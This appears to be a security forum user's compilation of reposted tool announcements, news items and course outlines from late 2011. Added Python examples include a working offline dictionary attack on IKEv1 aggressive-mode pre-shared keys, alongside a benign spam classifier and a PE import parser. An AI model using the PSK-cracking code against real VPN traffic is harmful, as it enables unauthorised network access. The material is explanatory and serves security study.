Everything posted by Nytro
-
[h=1]Sophos Anti-Rootkit[/h]
[h=2]Free rootkit detection and removal tool[/h]
[h=3]Important note[/h]
We are currently working to enhance the detection power of the Sophos Anti-Rootkit Tool to better find and remove the latest forms of rootkits. This updated version will be available to download in February 2012. Should you have any questions about the current version of this tool, please visit our SophosFreeTalk Community.
[h=3]Rootkit scanning, detection and removal[/h]
Our free software, Sophos Anti-Rootkit, scans, detects and removes any rootkit that is hidden on your computer using advanced rootkit detection technology. Rootkits can lie hidden on computers and remain undetected by antivirus software. Although new rootkits can be prevented from infecting the system, if you had any rootkits before you installed your antivirus, they may never be revealed. Removing rootkits without compromising system integrity is particularly challenging and needs to be done with care.
[h=3]Simplified management[/h]
Using Sophos Anti-Rootkit is easy. Whether you use its simple graphical user interface or run it from the command line, you can easily detect and remove any rootkits on your computer.
[h=3]Easy to use[/h]
Sophos Anti-Rootkit provides an extra layer of protection, by safely and reliably detecting and removing any rootkit that might have hidden itself on your system.
[h=3]Stay free of rootkits[/h]
As part of its complete protection of endpoint computers, Sophos Endpoint Security and Data Protection has an integrated detection functionality that removes rootkits and prevents them being installed onto your desktops, laptops and servers.
Download: http://www.sophos.com/en-us/products/free-tools/sophos-anti-rootkit/download.aspx
Source: Sophos Anti-Rootkit - Free Rootkit Detection and Removal Tool
Via: Top 3 Tools To Remove Rootkits and Prevent Them from Infecting Your PC
-
Trend Micro RootkitBuster 5.00 Beta
Released: 2011-08-15
Download: http://www.trendmicro.com/ftp/products/rootkitbuster/RootkitBuster_5.00.1041.zip
Source: Top 3 Tools To Remove Rootkits and Prevent Them from Infecting Your PC
-
[h=1]Kindle Fire gets a bite of Android 4.0 Ice Cream Sandwich[/h]
December 26, 2011 | Devindra Hardawar
Well that didn't take very long. Amazon's Kindle Fire tablet, which you've likely seen gifted quite a bit this holiday season, has been hacked to run a "pre-alpha" version of Android 4.0 Ice Cream Sandwich. You can thank the intrepid hackers over at the xda-developers forum for the release, which marks the first time Android 4.0 has hit the Kindle Fire.
A hack such as this is likely the only way Kindle Fire owners can get their hands on Android 4.0. Given the hefty hardware requirements for Android 4.0 devices, plus Amazon's need for a highly customized user interface on the Kindle Fire, you'll likely never see an official Ice Cream Sandwich release on the tablet.
The hack, which is based on the custom Android firmware CyanogenMod 9, is certainly far from complete. Audio and graphical glitches (especially while playing videos) abound, and touch screen interaction seems fairly unresponsive, according to the above video from Liliputing. Still, it's a mighty first step for Kindle Fire hackers, and it's likely the first of many such releases from various development groups. Given its $200 price and wide availability, the Kindle Fire is the new target for any hacker looking to make a name for themselves.
Via The Verge
Source: Kindle Fire gets a bite of Android 4.0 Ice Cream Sandwich | VentureBeat
-
Cuckoo Sandbox
Automated Malware Analysis System
In three words, Cuckoo Sandbox is a malware analysis system. Its goal is to provide you a way to automatically analyze files and collect comprehensive results describing and outlining what such files do while executed inside an isolated environment. It's mostly used to analyze Windows executables, DLL files, PDF documents, Office documents, PHP scripts, Python scripts, Internet URLs and almost anything else you can imagine. But it can do much more... It's up to you to discover what and how.
Some of the results that Cuckoo generates are:
- Trace of performed relevant win32 API calls
- Dump of network traffic generated during analysis
- Creation of screenshots taken during analysis
- Dump of files created, deleted and downloaded by the malware during analysis
- Trace of assembly instructions executed by malware process
In addition, Cuckoo allows you to:
- Automate submission of analysis tasks
- Create analysis packages to define custom operations and procedures for performing an analysis
- Run multiple virtual machines concurrently
- Script the process and correlation of analysis results data
- Script and automate the generation of reports in the format you prefer
Download
Current Cuckoo Sandbox's version is 0.3.
http://www.cuckoobox.org/downloads/0.3/cuckoo_0.3.tar.gz
Docs: http://www.cuckoobox.org/doc/0.3/latex/CuckooSandbox.pdf
Demo:
Source: Cuckoo Sandbox
-
GoDaddy loses 21,000 domains in a day
By Natalie Weinstein on Dec 27, 2011
Domain registrar Go Daddy lost over 21,000 domains yesterday. It could be a coincidence, or it could be the result of the company's PR debacle over its support for the Stop Online Piracy Act.
Yesterday, Go Daddy actually reversed course and dropped its support for the controversial legislation. "Go Daddy will support it when and if the Internet community supports it," Go Daddy CEO Warren Adelman announced in a statement.
SOPA, introduced in Congress this fall, would make it easier for the Justice Department to shut down sites allegedly dedicated to piracy. An anti-Go Daddy thread on social site Reddit led to the creation of Godaddyboycott.org, a site set up to let people amass their disapproval with the company's support of SOPA.
While 21,054 domains transferred out Friday of Domaincontrol.com, which is managed by Go Daddy, it is only fair to note that 20,034 transferred in the same day, according to domain tracker Dailychanges.com. According to techie site TheNextWeb.com, though, the transfers-out have been building over the course of the week, with 8,800 reported on Monday and 14,500 on Wednesday.
Go Daddy did not immediately respond to CNET's request for comment.
Via CNET
Source: GoDaddy loses 21,000 domains in a day - Crave - CNET Asia
-
[h=1]Audit Windows Passwords With Password Security Scanner[/h]
Keeping track of all accounts and passwords can be a daunting task for some users. One reason for that is that most use multiple applications that may require passwords. Think of desktop email clients, instant messengers or web browsers for instance. Even if you are using a password manager like KeePass, you will usually have programs that save account information and passwords for you. That's a problem if you want an overview of all passwords, or want to make sure that all are secure.
The new Nirsoft application Password Security Scanner has been designed to audit Windows passwords. The first release supports auditing passwords stored in Internet Explorer, Mozilla Firefox, MSN, Microsoft Outlook and Windows Live Mail, as well as dialup and VPN passwords. The program scans the operating system for all supported programs and displays all passwords that it finds in a list.
Password Security Scanner lists the item name (usually a domain name), the type (browser, email), the application the password was found in, the username, the password length, the password strength, and even the type of characters used by the password.
Firefox users need to disable the master password if set up, as it blocks access to the password list. This is done under Options > Security > Master Password in the browser.
The password length and strength give detailed information about a password's security. The information may for instance be used to change weak passwords on the system. Keep in mind though that all passwords read by the application are openly accessible on the system. Someone with direct access to the PC could retrieve the account information regardless of password length. Users can however use the information to delete passwords that are out in the open on their system. While that may not always be a practicable solution, it may work in some cases.
The data can be exported into text, csv and xml files, and HTML reports.
Windows users can download the portable program from the official program website.
Source: Audit Windows Passwords With Password Security Scanner
-
[h=1]This is what a 5MB hard drive looked like in 1956[/h]
26th December 2011 by Zee
'In September 1956 IBM launched the 305 RAMAC, the first 'SUPER' computer with a hard disk drive (HDD). The HDD weighed over a ton and stored 5 MB of data.'
Texomatube via Retronaught (Thanks @Atul)
Source: What a 5MB Hard Drive Looked Like in 1956
-
[h=1]Naval researchers pioneer TCP-based spam detection[/h]
[h=2]A group of researchers has built a SpamAssassin plug-in that detects spam by TCP usage[/h]
By Joab Jackson December 23, 2011, 4:39 PM
A group of researchers from the U.S. Naval Academy has developed a technique for analyzing email traffic in real-time to identify spam messages as they come across the wire, simply using information from the TCP (Transmission Control Protocol) packets that carry the messages.
This approach could be a useful addition to the arsenal of today's spam-fighting techniques, observers argue, in that, unlike other typical spam fighting approaches, the content of the email does not have to be scanned.
The work "advanced both the science of spam fighting and ... worked through all the engineering challenges of getting these techniques built into the most popular open-source spam filter," said Massachusetts Institute of Technology computer science research affiliate Steve Bauer, who was not involved with the work. "So this is both a clever bit of research and genuinely practical contribution to the persistent problem of fighting spam."
Researchers Robert Beverly, Georgios Kakavelakis and Joel Young built a plug-in for the SpamAssassin mail filter, called SpamFlow, that incorporates their analysis techniques. They presented their work at the Usenix Large Installation System Administration (LISA) conference earlier this month in Boston.
In the paper that accompanied the presentation, the researchers showed that spam email blasts have certain characteristics at the networking transport layer. Signal analysis of factors such as timing, packet reordering, congestion and flow control can reveal the work of a spam-spewing botnet.
"A lot of spam comes from spambots, which are sending as fast as they can and congesting their local uplink," Beverly said. "So you can detect them by looking really hard at the TCP stream."
Thus far, earlier techniques developed for analyzing spam at the network transport layer have been offline, which is to say, the email traffic is analyzed as a batch, and the results can be used later. The naval researchers have developed an architecture for analyzing network traffic as it comes over the wire.
For the implementation, they used the SpamAssassin email filter. SpamAssassin has a plug-in architecture for incorporating new filtering techniques. "We have a daemon that captures all the packets and looks at timing and other congestion characteristics of the traffic stream," Beverly said.
The plug-in can learn to identify and detect spam without human intervention. In tests, SpamFlow was able to correctly identify spam over 95 percent of the time, after a reception of 1,000 emails.
The ability to detect a spam message without actually examining the contents of the message would be handy in a number of situations, noted Bruce Davie, a Cisco fellow and visiting lecturer at MIT. Davie is familiar with though not involved in the work. An Internet service provider could apply the detection algorithm without violating users' privacy. It can be used to detect messages that are encrypted, such as those traveling over an encrypted link. It can also be used to detect other forms of malicious traffic, such as port scans from botnet hosts.
"Overall, I see it as a generally useful tool in the fight against malicious traffic," Davie said. "You can combine it with traditional anti-spam techniques to improve accuracy."
Currently, the team is beta testing the software at a number of locations. They plan to release it as open-source software afterward. The U.S. National Science Foundation funded part of this work, under the Software Development for Cyberinfrastructure (SDCI) program.
Source: Naval researchers pioneer TCP-based spam detection | ITworld
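The idea in the article, classifying a mail flow from transport-layer behaviour alone, as an added example. This is not SpamFlow's code, feature set or classifier; it shows one way to turn a captured sender-to-MX packet stream into features (retransmissions, reordering, timing jitter, advertised window) and train a nearest-centroid model on labelled flows. The packet tuples and the training flows are constructed test data.

```python
"""Classify SMTP flows from TCP behaviour alone, without reading the mail.

Added illustration of the SpamFlow idea (a bot saturating its uplink shows up
as retransmissions, jittery timing and small windows); not the researchers'
code, features or classifier. Packets are constructed
(timestamp, seq, payload_len, advertised_window) tuples for one direction.
"""
from statistics import mean, pstdev


def flow_features(pkts):
    """Five transport-layer features for one direction of a TCP flow."""
    if len(pkts) < 2:
        return [0.0] * 5
    seen, highest = set(), 0
    retrans = reorder = 0
    for _t, seq, ln, _w in pkts:
        if ln == 0:
            continue
        if seq in seen:
            retrans += 1            # same segment sent again
        elif seq < highest:
            reorder += 1            # new data arriving behind the high-water mark
        seen.add(seq)
        highest = max(highest, seq + ln)
    gaps = [b[0] - a[0] for a, b in zip(pkts, pkts[1:])]
    mg = mean(gaps)
    return [
        retrans / len(pkts),
        reorder / len(pkts),
        mg,                                        # mean inter-packet gap (s)
        pstdev(gaps) / mg if mg else 0.0,          # timing jitter (coefficient of variation)
        min(w for *_, w in pkts) / 65535.0,        # smallest advertised window, normalised
    ]


def train(labelled_flows):
    """Nearest-centroid model: per-class mean of standardised features."""
    feats = [(flow_features(p), label) for p, label in labelled_flows]
    cols = list(zip(*(f for f, _ in feats)))
    mu = [mean(c) for c in cols]
    sd = [pstdev(c) or 1.0 for c in cols]          # constant feature: no influence
    z = lambda f: [(x - m) / s for x, m, s in zip(f, mu, sd)]
    centroids = {}
    for label in {l for _, l in feats}:
        rows = [z(f) for f, l in feats if l == label]
        centroids[label] = [mean(c) for c in zip(*rows)]
    return {"mu": mu, "sd": sd, "centroids": centroids}


def classify(model, pkts):
    """Label of the closest centroid in standardised feature space."""
    f = [(x - m) / s for x, m, s in zip(flow_features(pkts), model["mu"], model["sd"])]
    dist = lambda c: sum((a - b) ** 2 for a, b in zip(f, c))
    return min(model["centroids"], key=lambda lbl: dist(model["centroids"][lbl]))


def make_flow(n, gap, retrans_every=0, rwnd=65535, jitter=0.0):
    """Constructed flow: n full segments roughly `gap` seconds apart, optionally
    retransmitting every k-th segment and wobbling the timing deterministically."""
    pkts, t, seq = [], 0.0, 1000
    for i in range(n):
        pkts.append((t, seq, 1460, rwnd))
        if retrans_every and i % retrans_every == retrans_every - 1:
            pkts.append((t + gap * 0.2, seq, 1460, rwnd))   # duplicate of the same segment
        seq += 1460
        t += gap * (1 + jitter * ((i % 3) - 1))
    return pkts


# Constructed labelled training flows: steady senders vs. congested bots.
TRAINING = [
    (make_flow(20, 0.050), "ham"),
    (make_flow(30, 0.040, jitter=0.1), "ham"),
    (make_flow(20, 0.010, retrans_every=3, rwnd=8192, jitter=0.6), "spam"),
    (make_flow(40, 0.005, retrans_every=2, rwnd=4096, jitter=0.5), "spam"),
]
MODEL = train(TRAINING)

if __name__ == "__main__":
    print(classify(MODEL, make_flow(25, 0.008, retrans_every=4, rwnd=8192, jitter=0.4)))
```

A real deployment would feed the feature extractor from a capture daemon per SMTP connection and hand the label to SpamAssassin as one more score, which is the combination with content filters that Davie describes.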
-
Sandcat Pro v4.2.8 adds NoSQL Injection detection
By MaxiSoler on 27 December 2011 in Tools with No Comments
Sandcat combines Syhunt's state-of-the-art, multi-process scanning technologies with the incredibly fast Lua language to perform remote web application security scans. While spidering a web site and hunting vulnerabilities, Sandcat emulates a modern, HTML 5-aware web browser, making sure every web application gets fully tested.
Changelog v4.2.8
This version adds techniques for detecting vulnerabilities in web applications using NoSQL database engines and web systems supporting server-side JavaScript execution. This includes NoSQL injection, blind NoSQL injection and Denial-of-Service vulnerabilities. It also includes enhanced versions of the Sandcat Code scanner with source code checks for these specific vulnerability classes, and is accompanied by an article (Time-Based NoSQL Injection, available here) that highlights additional risks involving server-side JavaScript execution not restricted to NoSQL database engines.
Download: http://www.syhunt.com/?n=Sandcat.Download
Source: Sandcat Pro v4.2.8 adds NoSQL Injection detection
-
[h=3]IKECrack[/h]
IKECrack is an open source IKE/IPSec authentication crack tool. This tool is designed to bruteforce or dictionary attack the key/password used with Pre-Shared-Key [PSK] IKE authentication. The open source version of this tool is to demonstrate proof-of-concept, and will work with RFC 2409 based aggressive mode PSK authentication. Our SourceForge development area is at IKECrack | Free Security & Utilities software downloads at SourceForge.net
[h=4]Presentation Materials and Additional Tools[/h]
My ToorCon 2K2 preso on IKE hacking can be downloaded here
The IKEProber tool mentioned in the preso can be downloaded here
[h=4]IKE Aggressive Mode BruteForce Summary[/h]
Aggressive Mode IKE authentication is composed of the following steps:
1 - Initiating client sends encryption options proposal, DH public key, random number [nonce_i], and an ID in an un-encrypted packet to the gateway/responder.
2 - Responder creates a DH public value, another random number [nonce_r], and calculates a HASH that is sent back to the initiator in an un-encrypted packet. This hash is used to authenticate the parties to each other, and is based on the exchanged nonces, DH public values, the initiator ID, other values from the initiator packet, and the Pre-Shared-Key [PSK].
3 - The Initiating client sends a reply packet also containing a HASH, but this response is normally sent in an encrypted packet.
IKECrack utilizes the HASH sent in step 2, and attempts a realtime bruteforce of the PSK. This involves a HMAC-MD5 of the PSK with nonce values to determine the SKEYID, and a HMAC-MD5 of the SKEYID with DH pubkeys, cookies, ID, and SA proposal. In practice, SKEYID and HASH_R are calculated with the hash cipher proposed by the initiator, so could actually be either SHA1 or MD5 in HMAC mode.
[h=4]Project Details[/h]
Author: Anton T. Rager
IKECrack utilizes components from the following OpenSource/PublicDomain programs:
MDCrack
HiFn Linux Drivers - HiFn makes one of the better commercial encryption/compression accelerators. I have access to 7751 based PCI cards, and plan on using one for offloading MD5, SHA1, DES, and 3DES
Ron Rivest's MD5
Simeon Pilgrim's Reverse MD5
MD5 and HMAC-MD5 PerlMods
libpcap
[h=4]Performance[/h]
Initial testing with Perl based IKECrack shows numbers of 18,000 tests per second with a PIII 700, and can bruteforce 3 chars of ucase/lcase/0-9 in 13 seconds. MDCrack [a MD5 bruteforce tool] can achieve 1.5 million keys per second with pure MD5 and a PIII 700. PSK bruteforcing consists of 4 MD5's, and 4 64 byte XORs... but should still be able to achieve 375,000 IKE keys per second. Preliminary tests in C have shown 26,000 keys per second with un-optimized routines. I'm hoping that Simeon Pilgrim's MD5 routines will speed this up a bit more.
[h=4]Cool Links[/h]
Other projects we are considering integrating into IKECrack:
dkbf - An open source distributed NT LANMan/Hash cracker using MPI - An IKECrack cluster!
Download: http://sourceforge.net/projects/ikecrack/files/latest/download
Source: IKECrack - Bruteforce crack for IPSec
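The attack summarised above, as an added example that is not IKECrack's code: recompute SKEYID and HASH_R per RFC 2409 for each candidate PSK and compare against the HASH_R the responder sent in the clear. The capture is constructed test data (fixed nonces, cookies, DH values, SA and ID bodies that only follow the RFC layout, not a real exchange); the wordlist and the PSK names are assumptions. The hash is selectable as md5 or sha1, matching the note that either may be negotiated.

```python
"""Offline dictionary attack on IKEv1 Aggressive Mode PSK authentication.

Added illustration of the attack described above; not IKECrack's code.
HASH_R travels in the clear in the responder's packet, so an eavesdropper
can recompute it for every candidate PSK (RFC 2409 sections 5 and 5.4).
"""
import hashlib
import hmac


def prf(hash_name, key, data):
    """HMAC with the negotiated hash; IKEv1 allows md5 or sha1 here."""
    return hmac.new(key, data, getattr(hashlib, hash_name)).digest()


def skeyid_psk(hash_name, psk, ni_b, nr_b):
    """RFC 2409 5.4: SKEYID = prf(pre-shared-key, Ni_b | Nr_b)."""
    return prf(hash_name, psk, ni_b + nr_b)


def hash_r(hash_name, skeyid, cap):
    """RFC 2409 5: HASH_R = prf(SKEYID, g^xr | g^xi | CKY-R | CKY-I | SAi_b | IDir_b)."""
    return prf(hash_name, skeyid,
               cap["g_xr"] + cap["g_xi"] + cap["cky_r"] + cap["cky_i"]
               + cap["sai_b"] + cap["idir_b"])


def make_capture(psk, hash_name="sha1"):
    """Constructed stand-in for the fields a sniffer extracts from the two
    cleartext Aggressive Mode packets. Everything here is fixed test data;
    only the layout (8-byte cookies, 1024-bit DH values, ID body) is real."""
    fill = lambda label, n: (hashlib.sha256(label).digest() * 4)[:n]
    cap = {
        "hash": hash_name,
        "cky_i": fill(b"initiator cookie", 8),
        "cky_r": fill(b"responder cookie", 8),
        "ni": fill(b"initiator nonce", 20),
        "nr": fill(b"responder nonce", 20),
        "g_xi": fill(b"initiator DH public value", 128),
        "g_xr": fill(b"responder DH public value", 128),
        "sai_b": fill(b"SA payload body (proposal + transforms)", 48),
        # ID payload body: ID_FQDN (type 2), protocol 0, port 0, then the name
        "idir_b": b"\x02\x00\x00\x00" + b"vpn.example.com",
    }
    skeyid = skeyid_psk(hash_name, psk.encode(), cap["ni"], cap["nr"])
    cap["hash_r"] = hash_r(hash_name, skeyid, cap)
    return cap


def crack_psk(cap, wordlist):
    """Return the first candidate PSK whose recomputed HASH_R matches, else None."""
    for word in wordlist:
        skeyid = skeyid_psk(cap["hash"], word.encode(), cap["ni"], cap["nr"])
        if hmac.compare_digest(hash_r(cap["hash"], skeyid, cap), cap["hash_r"]):
            return word
    return None


if __name__ == "__main__":
    capture = make_capture("tr0ub4dor", "md5")
    print(crack_psk(capture, ["password", "letmein", "tr0ub4dor"]))
```

Against a real capture the dictionary fields come from the initiator's first packet (cookie, SA body, nonce, DH value, ID) and the responder's reply (cookie, nonce, DH value, HASH_R); the per-guess cost is two HMACs, which is why the Performance section above counts MD5 operations. The defensive corollary is that a PSK used with aggressive mode must survive an offline attack, or main mode and certificate authentication should be used instead.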
-
[h=2]A Robot… That Can See Through Walls![/h]
posted Dec 26th 2011 3:56pm by Jeremy Cook
Robots on four wheels are fun on their own merits, but one thing that most lack is the ability to see through walls. With its onboard radar system, this bot is equipped to see objects that a person couldn't normally detect on the other side of the wall.
Although some of the more "nuts and bolts" details of this build are missing, the robot uses an Ultra-Wideband Radar system called the [D1] Radar System. This system can, according to their documentation, "Avoid false positives caused by vapor, dust, smoke, rain or other small particles." Apparently this means drywall as well if programmed correctly.
In the video after the break, the robot's sensor package is programmed to ignore anything within 1.5 meters. This allows the robot to mirror the movement of the apparent shelving unit on the other side. This sensor could certainly have some interesting robotics applications besides imitating a rolling shelf, so we're excited to see what it will be used for!
Source: A Robot… That Can See Through Walls! - Hack a Day
-
The Life of Binaries
Creator: Xeno Kovah
License: Creative Commons Share-Alike (http://creativecommons.org/licenses/by-sa/3.0/)
Lab Requirements: Requires a Windows system with Visual C++ Express Edition, Windows DDK or WDK kernel module compilation environment, and WinDbg. Requires a Windows guest OS running in VMWare Player or VMWare Server in order to do kernel debugging with WinDbg from the host OS.
Recommended Class Duration: 3 days (class previously taught in 2 days which was too little)
Creator Available for Training: Yes
Author Comments:
Topics include but are not limited to:
• Scanning and tokenizing source code.
• Parsing a grammar.
• Different targets for x86 assembly object files generation. (E.g. relocatable vs. position independent code).
• Linking object files together to create a well-formed binary.
• Detailed descriptions of the high level similarities and low level differences between the Windows PE and Linux ELF binary formats. (NOTE: we didn't get to this in the class where the video was recorded, but the materials are in the slides)
• How an OS loads a binary into memory and links it on the fly before executing it.
Along the way we discuss the relevance of security at different stages of a binary's life, from the tricks that can be played by a malicious compiler, to how viruses really work, to the way which malware "packers" duplicate OS process execution functionality, to the benefit of a security-enhanced OS loader which implements address space layout randomization (ASLR).
Lab work includes:
• Manipulating compiler options to change the type of assembly which is output
• Manipulating linker options to change the structure of binary formats
• Reading and understanding PE files with PEView
• Reading and understanding ELF files with Readelf (NOTE: we didn't get to this in the class where the video was recorded, but the materials are in the slides)
• Using WinDbg and/or GDB to watch the loader dynamically link an executable
• Using Thread Local Storage (TLS) to obfuscate control flow and serve as a basic anti-debug mechanism
• Creating a simple example virus for PE
• Analyze the changes made to the binary format when a file is packed with UPX
• Using the rootkit technique of Import Address Table (IAT) hooking to subvert the integrity of a program's calls to external libraries, allowing files to be hidden.
Knowledge of this material is recommended, but not required, for future classes such as Rootkits, but is required for reverse engineering.
To submit any suggestions, corrections, or explanations of things I didn't know the reasons for, please email me at the address included in the slides.
All Materials
LoBSlidesOnly.zip
LoBCodeOnly.zip
Videos of the class hosted at archive.org. These are useful for students, but also more useful for potential instructors who would like to teach this material. By watching the video, you will better understand the intent of some slides which do not stand on their own. You are recommended to watch the largest size video so that the most possible text is visible without having to follow along in the slides:
Online: Day 1 Part 1, Day 1 Part 2, Day 1 Part 3, Day 1 Part 4, Day 1 Part 5, Day 1 Part 6, Day 2 Part 1, Day 2 Part 2, Day 2 Part 3, Day 2 Part 4, Day 2 Part 5, Day 2 Part 6
Download videos:
http://www.archive.org/download/TheLifeOfBinariesDay1Part1/PR_LifeOfBinariesDay1Part1.mp4
http://www.archive.org/download/TheLifeOfBinariesDay1Part2/PR_LifeOfBinariesDay1Part2.mp4
http://www.archive.org/download/TheLifeOfBinariesDay1Part3/PR_LifeOfBinariesDay1Part3.mp4
http://www.archive.org/download/TheLifeOfBinariesDay1Part4/PR_LifeOfBinariesDay1Part4.mp4
http://www.archive.org/download/TheLifeOfBinariesDay1Part5/PR_LifeOfBinariesDay1Part5.mp4
http://www.archive.org/download/TheLifeOfBinariesDay1Part6/PR_LifeOfBinariesDay1Part6.mp4
http://www.archive.org/download/TheLifeOfBinariesDay2Part1/PR_LifeOfBinariesDay2Part1.mp4
http://www.archive.org/download/TheLifeOfBinariesDay2Part2/PR_LifeOfBinariesDay2Part2.mp4
http://www.archive.org/download/TheLifeOfBinariesDay2Part3/PR_LifeOfBinariesDay2Part3.mp4
http://www.archive.org/download/TheLifeOfBinariesDay2Part4/PR_LifeOfBinariesDay2Part4.mp4
http://www.archive.org/download/TheLifeOfBinariesDay2Part5/PR_LifeOfBinariesDay2Part5.mp4
http://www.archive.org/download/TheLifeOfBinariesDay2Part6/PR_LifeOfBinariesDay2Part6.mp4
Revision History:
09-06-2011 - Videos uploaded
02-16-2011 - Initial class content upload
If you have used and modified this material, we would appreciate it if you submit your modified version for publishing here, so that all versions can benefit from your changes.
Source: LifeOfBinaries
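The import table that the PEView and IAT-hooking labs above work with, walked from the on-disk format, as an added example that is not part of the class materials. Listing the imports from disk is the baseline an integrity check compares against: after the loader fills the IAT, each entry should point into the DLL named by its descriptor, and an IAT hook is an entry that does not. A minimal PE32 image is constructed in memory (headers and one import section for KERNEL32.dll; it is not an executable) so the parser runs without a real binary; the DLL and function names in it are illustrative choices.

```python
"""Walk a PE file's import directory, the table that IAT hooking rewrites.

Added example, not part of the class materials. A constructed minimal PE32
image is built in memory so the parser runs without a real binary; the walk
(headers -> data directory[1] -> descriptors -> hint/name entries) is the
same one PEView shows for a real executable.
"""
import struct

IMAGE_DIRECTORY_ENTRY_IMPORT = 1


def rva_to_offset(rva, sections):
    """Map a relative virtual address to a file offset via the section table."""
    for va, vsize, raw_ptr, raw_size in sections:
        if va <= rva < va + max(vsize, raw_size):
            return rva - va + raw_ptr
    raise ValueError("RVA 0x%x is not backed by any section" % rva)


def read_cstr(data, off):
    return data[off:data.index(b"\x00", off)].decode("ascii")


def parse_imports(data):
    """Return {dll_name: [imported function names or '#ordinal', ...]}."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    if data[e_lfanew:e_lfanew + 4] != b"PE\x00\x00":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    (nsections,) = struct.unpack_from("<H", data, coff + 2)
    (opt_size,) = struct.unpack_from("<H", data, coff + 16)
    opt = coff + 20
    (magic,) = struct.unpack_from("<H", data, opt)
    if magic == 0x10B:        # PE32: data directories at +96, 32-bit thunks
        dd, thunk_fmt, ordinal_flag = opt + 96, "<I", 1 << 31
    elif magic == 0x20B:      # PE32+: data directories at +112, 64-bit thunks
        dd, thunk_fmt, ordinal_flag = opt + 112, "<Q", 1 << 63
    else:
        raise ValueError("unknown optional header magic 0x%x" % magic)
    sections = []
    for i in range(nsections):
        hdr = opt + opt_size + i * 40
        vsize, va, raw_size, raw_ptr = struct.unpack_from("<IIII", data, hdr + 8)
        sections.append((va, vsize, raw_ptr, raw_size))
    imp_rva, _imp_size = struct.unpack_from("<II", data, dd + 8 * IMAGE_DIRECTORY_ENTRY_IMPORT)
    imports = {}
    if imp_rva == 0:
        return imports                      # no import directory at all
    desc = rva_to_offset(imp_rva, sections)
    while True:
        ilt_rva, _stamp, _fwd, name_rva, iat_rva = struct.unpack_from("<IIIII", data, desc)
        if ilt_rva == 0 and name_rva == 0 and iat_rva == 0:
            break                           # all-zero descriptor terminates the list
        # Some linkers/packers zero OriginalFirstThunk; on disk the IAT holds the same RVAs
        thunk = rva_to_offset(ilt_rva or iat_rva, sections)
        names = []
        while True:
            (entry,) = struct.unpack_from(thunk_fmt, data, thunk)
            if entry == 0:
                break
            if entry & ordinal_flag:
                names.append("#%d" % (entry & 0xFFFF))
            else:                           # IMAGE_IMPORT_BY_NAME: 2-byte hint, then name
                names.append(read_cstr(data, rva_to_offset(entry, sections) + 2))
            thunk += struct.calcsize(thunk_fmt)
        imports[read_cstr(data, rva_to_offset(name_rva, sections))] = names
        desc += 20
    return imports


def build_sample_pe():
    """Constructed PE32 with one section holding an import directory for
    KERNEL32.dll (CreateFileW, WriteFile). Headers only; it is not runnable."""
    FILE_ALIGN, SECT_VA = 0x200, 0x1000
    names = b"\x00\x00CreateFileW\x00", b"\x00\x00WriteFile\x00"   # hint 0 + name
    ilt_off, iat_off, n1_off = 40, 52, 64
    n2_off = n1_off + len(names[0])
    dll_off = n2_off + len(names[1])
    body = struct.pack("<IIIII", SECT_VA + ilt_off, 0, 0, SECT_VA + dll_off, SECT_VA + iat_off)
    body += b"\x00" * 20                                        # terminating descriptor
    thunks = struct.pack("<III", SECT_VA + n1_off, SECT_VA + n2_off, 0)
    body += thunks + thunks + names[0] + names[1] + b"KERNEL32.dll\x00"
    dos = bytearray(64)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 64)                       # e_lfanew
    coff = struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, 224, 0x0102)  # i386, 1 section
    opt = bytearray(224)
    struct.pack_into("<H", opt, 0, 0x10B)                       # PE32 magic
    struct.pack_into("<III", opt, 28, 0x400000, SECT_VA, FILE_ALIGN)  # base, alignments
    struct.pack_into("<I", opt, 92, 16)                         # NumberOfRvaAndSizes
    struct.pack_into("<II", opt, 96 + 8 * IMAGE_DIRECTORY_ENTRY_IMPORT, SECT_VA, 40)
    sect_hdr = struct.pack("<8sIIII", b".idata", len(body), SECT_VA, FILE_ALIGN, FILE_ALIGN)
    image = dos + b"PE\x00\x00" + coff + opt + sect_hdr + b"\x00" * 16
    image += b"\x00" * (FILE_ALIGN - len(image))                # pad headers to file alignment
    return bytes(image + body + b"\x00" * (FILE_ALIGN - len(body)))


if __name__ == "__main__":
    print(parse_imports(build_sample_pe()))
```

Run against a real file with `parse_imports(open(path, "rb").read())`. The UPX lab above is the case where this walk gets short: a packed file imports only the handful of functions the stub needs, and the real import table is rebuilt in memory by the unpacker.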
-
Introductory Intel x86: Architecture, Assembly, Applications, & Alliteration
Creator: Xeno Kovah
License: Creative Commons Share-Alike (http://creativecommons.org/licenses/by-sa/3.0/)
Lab Requirements: Requires a Windows system with Visual C++ Express Edition. Requires a Linux system with gcc and gdb, and the CMU binary bomb installed. Either system can be physical or virtual.
Recommended Class Duration: 2-3 days
Creator Available for Training: Yes
Author Comments:
Intel processors have been a major force in personal computing for more than 30 years. An understanding of low level computing mechanisms used in Intel chips as taught in this course serves as a foundation upon which to better understand other hardware, as well as many technical specialties such as reverse engineering, compiler design, operating system design, code optimization, and vulnerability exploitation.
25% of the time will be spent bootstrapping knowledge of fully OS-independent aspects of Intel architecture. 50% will be spent learning Windows tools and analysis of simple programs. The final 25% of time will be spent learning Linux tools for analysis.
This class serves as a foundation for the follow on Intermediate level x86 class. It teaches the basic concepts and describes the hardware that assembly code deals with. It also goes over many of the most common assembly instructions. Although x86 has hundreds of special purpose instructions, students will be shown it is possible to read most programs by knowing only around 20-30 instructions and their variations.
The instructor-led lab work will include:
* Stepping through a small program and watching the changes to the stack at each instruction (push, pop, call, ret (return), mov)
* Stepping through a slightly more complicated program (adds lea (load effective address), add, sub)
* Understanding the correspondence between C and assembly control transfer mechanisms (e.g. goto in C == jmp in asm)
* Understanding conditional control flow and how loops are translated from C to asm (conditional jumps, jge (jump greater than or equal), jle (jump less than or equal), ja (jump above), cmp (compare), test, etc)
* Boolean logic (and, or, xor, not)
* Logical and Arithmetic bit shift instructions and the cases where each would be used (shl (logical shift left), shr (logical shift right), sal (arithmetic shift left), sar (arithmetic shift right))
* Signed and unsigned multiplication and division
* Special one instruction loops and how C functions like memset or memcpy can be implemented in one instruction plus setup (rep stos (repeat store to string), rep mov (repeat mov))
* Misc instructions like leave and nop (no operation)
* Running examples in the Visual Studio debugger on Windows and the Gnu Debugger (GDB) on Linux
* The famous "binary bomb" lab from the Carnegie Mellon University computer architecture class, which requires the student to do basic reverse engineering to progress through the different phases of the bomb giving the correct input to avoid it "blowing up". This will be an independent activity.
